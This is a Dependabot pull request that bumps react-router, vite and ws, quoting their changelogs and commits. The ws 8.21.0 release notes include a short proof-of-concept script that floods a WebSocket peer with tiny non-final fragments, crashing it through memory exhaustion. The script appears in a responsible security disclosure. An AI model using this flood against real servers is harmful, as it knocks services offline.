chore(deps): bump the npm_and_yarn group across 1 directory with 3 updates

[dependabot]

Bumps the npm_and_yarn group with 3 updates in the / directory: react-router, vite and ws.

Updates react-router from 7.15.0 to 7.15.1

Release notes

Sourced from react-router's releases.

v7.15.1

See the changelog for release notes: https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v7151

Changelog

Sourced from react-router's changelog.

v7.15.1

Patch Changes

• Update router to operate on fetcher Maps in an immutable manner to avoid delayed React renders from potentially reading an updated but not yet committed Map. This could result in brief flickers in some fetcher-driven optimistic UI scenarios. (#15028)
• Fix serverLoader() returning stale SSR data when a client navigation aborts pending hydration before the hydration clientLoader resolves (#15022)
• Fix RouterProvider onError callback not being called for synchronous initial loader errors in SPA mode (#15039) (#14942)
• Memoize useFetchers to return a stable identity and only change if fetchers changed (#15028)
• Internal refactor to consolidate mutation request detection through shared utility (#15033)

Unstable Changes

⚠️ Unstable features are not recommended for production use

• Add a new unstable_useRouterState() hook that consolidates access to active and pending router states (RFC: #12358) (#15017)

  • Data/Framework/RSC only — throws when used without a data router

  • This should allow you to consolidate usages of the following hooks which will likely be deprecated and removed in a future major version

    • useLocation
    • useSearchParams
    • useParams
    • useMatches
    • useNavigationType
    • useNavigation

    let { active, pending } = unstable_useRouterState();
    // Active is always populated with the current location
    active.location; // replaces useLocation()
    active.searchParams; // replaces useSearchParams()[0]
    active.params; // replaces useParams()
    active.matches; // replaces useMatches()
    active.type; // replaces useNavigationType()
    // Pending is only populated during a navigation
    pending.location; // replaces useNavigation().location
    pending.searchParams; // equivalent to new URLSearchParams(useNavigation().search)
    pending.params; // Not directly accessible today
    pending.matches; // Not directly accessible today
    pending.type; // Not directly accessible today
    pending.state; // replaces useNavigation().state
    pending.formMethod; // replaces useNavigation().formMethod
    pending.formAction; // replaces useNavigation().formAction
    pending.formEncType; // replaces useNavigation().formEncType
    pending.formData; // replaces useNavigation().formData
    pending.json; // replaces useNavigation().json
    pending.text; // replaces useNavigation().text

Commits

• 587d08f Release v7.15.1 (#15038)
• 89996bd Fire onError for initial-load errors when RouterProvider mounts late (#15039)
• 4322e58 Update docs for useRouterState
• fadd6c4 Merge branch 'main' into release
• 6bf91ce chore: format
• 44c3478 fix: prevent fetcher formData flicker and eliminate state.fetchers mutations ...
• 7e6725a Cleanup lint issues (#15030)
• aabd30c Use shared isMutationMethod check (#15033)
• 954a4a6 Fix stale SSR data when hydration is aborted by a same-route navigation (#15022)
• 041cd32 fix(react-router): Internal preloads refactor to preserve types (#14860)
• Additional commits viewable in compare view

Updates vite from 7.3.2 to 7.3.5

Release notes

Sourced from vite's releases.

v7.3.5

Please refer to CHANGELOG.md for details.

v7.3.3

Please refer to CHANGELOG.md for details.

Changelog

Sourced from vite's changelog.

7.3.5 (2026-06-01)

Bug Fixes

• backport #22572, reject windows alternate paths (#22574) (8c18556)
• deps: backport #22571, reject UNC paths for launch-editor-middleware (#22573) (f20d64b)

Miscellaneous Chores

• skip v7.3.4 release (8a6a0c9)

7.3.4 (2026-06-01)

Bug Fixes

• backport #22572, reject windows alternate paths (#22574) (8c18556)
• deps: backport #22571, reject UNC paths for launch-editor-middleware (#22573) (f20d64b)

7.3.3 (2026-05-07)

Bug Fixes

• avoid destructure lowering for newer safari (#22346) (5ab51c0)

Commits

• 077945c release: v7.3.5
• 8a6a0c9 chore: skip v7.3.4 release
• 8c18556 fix: backport #22572, reject windows alternate paths (#22574)
• f20d64b fix(deps): backport #22571, reject UNC paths for launch-editor-middleware (#2...
• ca31424 release: v7.3.3
• 5ab51c0 fix: avoid destructure lowering for newer safari (#22346)
• See full diff in compare view

Updates ws from 8.20.1 to 8.21.0

Release notes

Sourced from ws's releases.

8.21.0

Features

• Introduced the maxBufferedChunks and maxFragments options (2b2abd45).

Bug fixes

• Fixed a remote memory exhaustion DoS vulnerability (2b2abd45).

A high volume of tiny fragments and data chunks could be sent by a peer, using modest network traffic, to crash a ws server or client due to OOM.

import { WebSocket, WebSocketServer } from 'ws';
const wss = new WebSocketServer({ port: 0 }, function () {
const data = Buffer.alloc(1);
const options = { fin: false };
const { port } = wss.address();
const ws = new WebSocket(ws://localhost:${port});
ws.on('open', function () {
(function send() {
ws.send(data, options, function (err) {
if (err) return;
send();
});
})();
});
ws.on('error', console.error);
ws.on('close', function (code, reason) {
console.log(client close - code: ${code} reason: ${reason.toString()});
});
});
wss.on('connection', function (ws) {
ws.on('error', console.error);
ws.on('close', function (code, reason) {
console.log(server close - code: ${code} reason: ${reason.toString()});
});
});

The vulnerability was responsibly disclosed and fixed by Nadav Magier.

In vulnerable versions, the issue can be mitigated by lowering the value of the maxPayload option if possible.

Commits

• bca91ad [dist] 8.21.0
• 2b2abd4 [security] Limit retained message parts
• 78eabe2 [security] Add latest vulnerability to SECURITY.md
• See full diff in compare view

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

---

Dependabot commands and options

You can trigger Dependabot actions by commenting on this PR:

• @dependabot rebase will rebase this PR
• @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
• @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
• @dependabot ignore <dependency name> major version will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)
• @dependabot ignore <dependency name> minor version will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)
• @dependabot ignore <dependency name> will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)
• @dependabot unignore <dependency name> will remove all of the ignore conditions of the specified dependency
• @dependabot unignore <dependency name> <ignore condition> will remove the ignore condition of the specified dependency and ignore conditions
  You can disable automated security fix PRs for this repo from the Security Alerts page.

[github-actions]

No React Doctor issues found. 🎉

_{Reviewed by React Doctor for commit ad98c1a.}